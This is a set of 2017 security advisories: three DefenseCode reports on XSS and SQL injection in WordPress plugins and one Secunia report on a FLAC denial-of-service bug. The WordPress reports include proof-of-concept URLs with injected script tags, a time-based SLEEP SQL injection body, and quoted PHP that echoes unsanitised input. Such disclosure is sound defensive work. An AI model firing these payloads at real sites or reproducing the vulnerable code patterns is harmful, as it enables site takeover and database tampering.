DefenseCode ThunderScan SAST Advisory: WordPress All In One Schema.org Rich Snippets Plugin Security Vulnerability

 DefenseCode ThunderScan SAST Advisory
      WordPress All In One Schema.org Rich Snippets Plugin
                      Security Vulnerability


Advisory ID:    DC-2017-01-002
Advisory Title: WordPress All In One Schema.org Rich Snippets Plugin
 Security Vulnerability
Advisory URL:     http://www.defensecode.com/advisories.php
Software:         WordPress All In One Schema.org Rich Snippets Plugin
Language:        PHP
Version:        1.4.1 and below
Vendor Status:    Vendor contacted, update released
Release Date:    2017/05/24
Risk:            Medium



1. General Overview
===================
During the security audit of All In One Schema.org Rich Snippets
plugin for WordPress CMS, security vulnerability was discovered using
DefenseCode ThunderScan application source code security analysis
platform.

More information about ThunderScan is available at URL:
http://www.defensecode.com


2. Software Overview
====================
According to the developers, All In One Schema.org Rich Snippets is a
WordPress plugin that is made to boost CTR, improve SEO and rankings,
and support most of the content type. The authors claim it works
perfectly with Google, Bing, Yahoo & Facebook.

According to wordpress.org, it has more than 50,000 active installs.

Homepage:
https://wordpress.org/plugins/all-in-one-schemaorg-rich-snippets/
https://www.brainstormforce.com/


3. Vulnerability Description
==================================
During the security analysis, ThunderScan discovered Cross-Site
Scripting vulnerability in All In One Schema.org Rich Snippets
WordPress plugin.

The Cross-Site Scripting vulnerability can enable the attacker to
construct the URL that contains malicious JavaScript code. If the
administrator of the site makes a request to such an URL, the
attacker's code will be executed, with unrestricted access to the
WordPress site in question. The attacker can entice the administrator
to visit the URL in various ways, including sending the URL by email,
posting it as a part of the comment on the vulnerable site or another
forum.

3.1 Cross-Site Scripting
  Vulnerable Function:    echo()
  Vulnerable Variable:    $_GET['bsf_send_label']
  Vulnerable URL:
http://vulnerablesite.com/wp-admin/admin.php?page=rich_snippet_dashboard&bsf_force_send=true&bsf_send_label=<%2Fscript><script>alert(1)<%2Fscript>
  File:                    all-in-one-schemaorg-rich-snippets\init.php
  ---------
    466    $label = $_GET['bsf_send_label'];
    ...
    471    $('td.savesend input').val('<?php echo $label; ?>');
  ---------


4. Solution
===========
Vendor resolved the security issues after we reported the
vulnerability. All users are strongly advised to update WordPress All
In One Schema.org Rich Snippets plugin to the latest available version


5. Credits
==========
Discovered with DefenseCode ThunderScan Source Code Security Analyzer
by Neven Biruski.


6. Disclosure Timeline
======================
2017/03/28    Vendor contacted
2017/03/29    Vendor responded
2017/05/24    Advisory released to the public


7. About DefenseCode
====================
DefenseCode L.L.C. delivers products and services designed to analyze
and test web, desktop and mobile applications for security
vulnerabilities.

DefenseCode ThunderScan is a SAST (Static Application Security
Testing, WhiteBox Testing) solution for performing extensive security
audits of application source code. ThunderScan SAST performs fast and
accurate analyses of large and complex source code projects delivering
precise results and low false positive rate.

DefenseCode WebScanner is a DAST (Dynamic Application Security
Testing, BlackBox Testing) solution for comprehensive security audits
of active web applications. WebScanner will test a website's security
by carrying out a large number of attacks using the most advanced
techniques, just as a real attacker would.

Subscribe for free software trial on our website
http://www.defensecode.com/ .

E-mail: defensecode[at]defensecode.com

Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/

DefenseCode ThunderScan SAST Advisory: WordPress Huge-IT Video Gallery Plugin Security Vulnerability

DefenseCode ThunderScan SAST Advisory
           WordPress Huge-IT Video Gallery Plugin
                   Security Vulnerability


Advisory ID:    DC-2017-01-009
Advisory Title: WordPress Huge-IT Video Gallery plugin SQL injection
 vulnerability
Advisory URL:     http://www.defensecode.com/advisories.php
Software:         WordPress Huge-IT Video Gallery plugin
Language:        PHP
Version:        2.0.4 and below
Vendor Status:    Vendor contacted, update released
Release Date:    2017/05/24
Risk:            High



1. General Overview
===================
During the security audit of Huge-IT Video Gallery plugin for
WordPress CMS, security vulnerability was discovered using DefenseCode
ThunderScan application source code security analysis platform.

More information about ThunderScan is available at URL:
http://www.defensecode.com


2. Software Overview
====================
According to the developers, Gallery Video plugin was created and
specifically designed to show video links in unusual splendid gallery
types supplemented of many gallery options.

According to wordpress.org, it has more than 40,000 active installs.

Homepage:
https://wordpress.org/plugins/gallery-video/
http://huge-it.com/wordpress-video-gallery/


3. Vulnerability Description
==================================
During the security analysis, ThunderScan discovered SQL injection
vulnerability in Huge-IT Video Gallery WordPress plugin.

The easiest way to reproduce the vulnerability is to visit the
provided URL while being logged in as administrator or another user
that is authorized to access the plugin settings page. Users that do
not have full administrative privileges could abuse the database
access the vulnerability provides to either escalate their privileges
or obtain and modify database contents they were not supposed to be
able to.

Due to the missing nonce token, the attacker the vulnerable code is
also directly exposed to attack vectors such as Cross Site request
forgery (CSRF).

3.1 SQL injection
  Vulnerable Function:    $wpdb->get_var( $query );
  Vulnerable Variable:    $_POST['cat_search']
  Vulnerable URL:
http://www.vulnerablesite.com/wp-admin/admin.php?page=video_galleries_huge_it_video_gallery
  Vulnerable Body:        cat_search=DefenseCode AND (SELECT * FROM
(SELECT(SLEEP(5)))DC)
  File:
gallery-video\includes\admin\class-gallery-video-galleries.php
    ---------
    107    $cat_id = sanitize_text_field( $_POST['cat_search'] );
    ...
    118       $where .= " AND sl_width=" . $cat_id;
    ...
    127    $query = "SELECT COUNT(*) FROM " . $wpdb->prefix .
"huge_it_videogallery_galleries" . $where;
    128    $total = $wpdb->get_var( $query );
    ---------


4. Solution
===========
Vendor resolved the security issues. All users are strongly advised to
update WordPress Huge-IT Video Gallery plugin to the latest available
version.


5. Credits
==========
Discovered with DefenseCode ThunderScan Source Code Security Analyzer
by Neven Biruski.


6. Disclosure Timeline
======================
2017/03/31    Vendor contacted
2017/04/06    Vendor responded
2017/05/24    Advisory released to the public


7. About DefenseCode
====================
DefenseCode L.L.C. delivers products and services designed to analyze
and test web, desktop and mobile applications for security
vulnerabilities.

DefenseCode ThunderScan is a SAST (Static Application Security
Testing, WhiteBox Testing) solution for performing extensive security
audits of application source code. ThunderScan SAST performs fast and
accurate analyses of large and complex source code projects delivering
precise results and low false positive rate.

DefenseCode WebScanner is a DAST (Dynamic Application Security
Testing, BlackBox Testing) solution for comprehensive security audits
of active web applications. WebScanner will test a website's security
by carrying out a large number of attacks using the most advanced
techniques, just as a real attacker would.

Subscribe for free software trial on our website
http://www.defensecode.com/ .

E-mail: defensecode[at]defensecode.com

Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/

DefenseCode ThunderScan SAST Advisory: WordPress AffiliateWP Plugin Security Vulnerability

  DefenseCode ThunderScan SAST Advisory
              WordPress AffiliateWP Plugin
                Security Vulnerability


Advisory ID:    DC-2017-05-05
Advisory Title: WordPress AffiliateWP Plugin Security Vulnerability
Advisory URL:     http://www.defensecode.com/advisories.php
Software:         WordPress AffiliateWP Plugin
Language:        PHP
Version:        2.0.8 and below (taken from the official GitHub repo)
Vendor Status:    Vendor contacted, update released
Release Date:    2017/05/24
Risk:            Medium



1. General Overview
===================
During the security audit of AffiliateWP plugin for WordPress CMS,
security vulnerability was discovered using DefenseCode ThunderScan
application source code security analysis platform.

More information about ThunderScan is available at URL:
http://www.defensecode.com


2. Software Overview
====================
According to the plugin developers, AffiliateWP is an easy-to-use,
reliable WordPress plugin that gives you the affiliate marketing tools
you need to grow your business and make more money. In 2016 it
surpassed $500,000 in annual revenue:
 https://pippinsplugins.com/2016-in-review/

Homepage:
 https://affiliatewp.com
 https://github.com/AffiliateWP/AffiliateWP


3. Vulnerability Description
==================================
During the security analysis, ThunderScan discovered Cross-Site
Scripting vulnerability in AffiliateWP WordPress plugin.

The Cross-Site Scripting vulnerability can enable the attacker to
construct the URL that contains malicious JavaScript code. If the
administrator of the site makes a request to such an URL, the
attacker's code will be executed, with unrestricted access to the
WordPress site in question. The attacker can entice the administrator
to visit the URL in various ways, including sending the URL by email,
posting it as a part of the comment on the vulnerable site or another
forum.

3.1 Cross-Site Scripting
  Vulnerable Function:    echo
  Vulnerable Variable:    $_REQUEST['filter_from']
  Vulnerable URL:
http://vulnerablesite.com//wp-admin/admin.php?page=affiliate-wp-referrals&filter_from=%27%3C%2Fscript%3E%3Cscript%3Ealert%2842%29%3C%2Fscript%3E
  File:
AffiliateWP-master\includes\admin\referrals\class-list-table.php
  ---------
  571 $from = ! empty( $_REQUEST['filter_from'] ) ?
$_REQUEST['filter_from'] : '';
  ...
  574 echo "<input type='text' class='affwp-datepicker'
autocomplete='off' name='filter_from' placeholder='" . __( 'From -
mm/dd/yyyy', 'affiliate-wp' ) . "' value='" . $from . "'/>";
  ---------


4. Solution
===========
Vendor resolved the security issues after we reported the
vulnerability. All users are strongly advised to update WordPress
AffiliateWP plugin to the latest available version.


5. Credits
==========
Discovered with DefenseCode ThunderScan Source Code Security Analyzer
by Neven Biruski.


6. Disclosure Timeline
======================
2017/05/16    Vendor contacted
2017/05/16    Vendor responded
2017/05/17    Update released
2017/05/24    Advisory released to the public


7. About DefenseCode
====================
DefenseCode L.L.C. delivers products and services designed to analyze
and test web, desktop and mobile applications for security
vulnerabilities.

DefenseCode ThunderScan is a SAST (Static Application Security
Testing, WhiteBox Testing) solution for performing extensive security
audits of application source code. ThunderScan SAST performs fast and
accurate analyses of large and complex source code projects delivering
precise results and low false positive rate.

DefenseCode WebScanner is a DAST (Dynamic Application Security
Testing, BlackBox Testing) solution for comprehensive security audits
of active web applications. WebScanner will test a website's security
by carrying out a large number of attacks using the most advanced
techniques, just as a real attacker would.

Subscribe for free software trial on our website
http://www.defensecode.com/ .

E-mail: defensecode[at]defensecode.com

Website: http://www.defensecode.com
Twitter: https://twitter.com/DefenseCode/

Secunia Research: FLAC "read_metadata_vorbiscomment_()" Memory Leak Denial of Service Vulnerability

============================================================
==========

                    Secunia Research 2017/05/11

        FLAC "read_metadata_vorbiscomment_()" Memory Leak
                 Denial of Service Vulnerability

======================================================================
Table of Contents

Affected Software....................................................1
Severity.............................................................2
Description of Vulnerability.........................................3
Solution.............................................................4
Time Table...........................................................5
Credits..............................................................6
References...........................................................7
About Flexera Software...............................................8
Verification.........................................................9

======================================================================
1) Affected Software

* FLAC version 1.3.2. Other versions may also be affected.

======================================================================
2) Severity

Rating: Moderately critical
Impact: Denial of Service
Where:  From remote

======================================================================
3) Description of Vulnerability

Secunia Research has discovered a vulnerability in FLAC, which can be
exploited by malicious people to cause a DoS (Denial of Service).

The vulnerability is caused due to an error in the
"read_metadata_vorbiscomment_()" function (stream_decoder.c), which
can be exploited to cause a memory leak via a specially crafted FLAC
file.

The vulnerability is confirmed in version 1.3.2. Other versions may
also be affected.

======================================================================
4) Solution

Fixed in the source code repository.

======================================================================
5) Time Table

2017/04/06 - Initial contact to request security contact.
2017/04/06 - Maintainer responds with security contact.
2017/04/06 - Maintainer contacted with the vulnerability details.
2017/04/08 - Maintainer provides a patch in the official source
             code repository.
2017/04/21 - Release of Secunia Advisory SA76102.
2017/05/11 - Public disclosure of Secunia Research Advisory.

======================================================================
6) Credits

Discovered by Jakub Jirasek, Secunia Research at Flexera Software.

======================================================================
7) References

The Flexera Software CNA has assigned the CVE-2017-6888 identifier
for the vulnerability through the Common Vulnerabilities and Exposures
(CVE) project.

======================================================================
8) About Flexera Software

Flexera Software helps application producers and enterprises increase
application usage and the value they derive from their software.

http://www.flexerasoftware.com/enterprise/company/about/

Flexera Software  delivers  market-leading  Software  Vulnerability
Management solutions enabling enterprises to proactively identify and
remediate software vulnerabilities, effectively reducing the risk of
costly security breaches.

http://www.flexerasoftware.com/enterprise/products/

Flexera  Software  supports  and  contributes  to  the community in
several ways.  We have always believed that reliable vulnerability
intelligence and tools to aid identifying and fixing vulnerabilities
should be  freely available  for  consumers  to ensure that users,
who care about their online privacy and security, can stay secure.
Only a few vendors address vulnerabilities in a proper way and help
users get updated  and  stay secure.  End-users (whether private
individuals or businesses) are otherwise left largely alone,  and
that is why back in 2002, Secunia Research started investigating,
coordinating  disclosure  and  verifying software vulnerabilities.
In  2016,  Secunia Research  became  a  part  of  Flexera Software
and today our in-house software vulnerability research remains the
core  of  the  Software  Vulnerability  Management  products  at
Flexera Software.

http://secunia.com/secunia_research/

The  public  Advisory database  contains sufficient information  for
researchers, security enthusiasts, and consumers to lookup individual
products and vulnerabilities  and  assess, whether they need to take
any actions to secure their systems or whether a given vulnerability
has already been discovered

http://secunia.com/advisories/

======================================================================
9) Verification

Please verify this advisory by visiting the Secunia website:
http://secunia.com/secunia_research/2017-7/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

======================================================================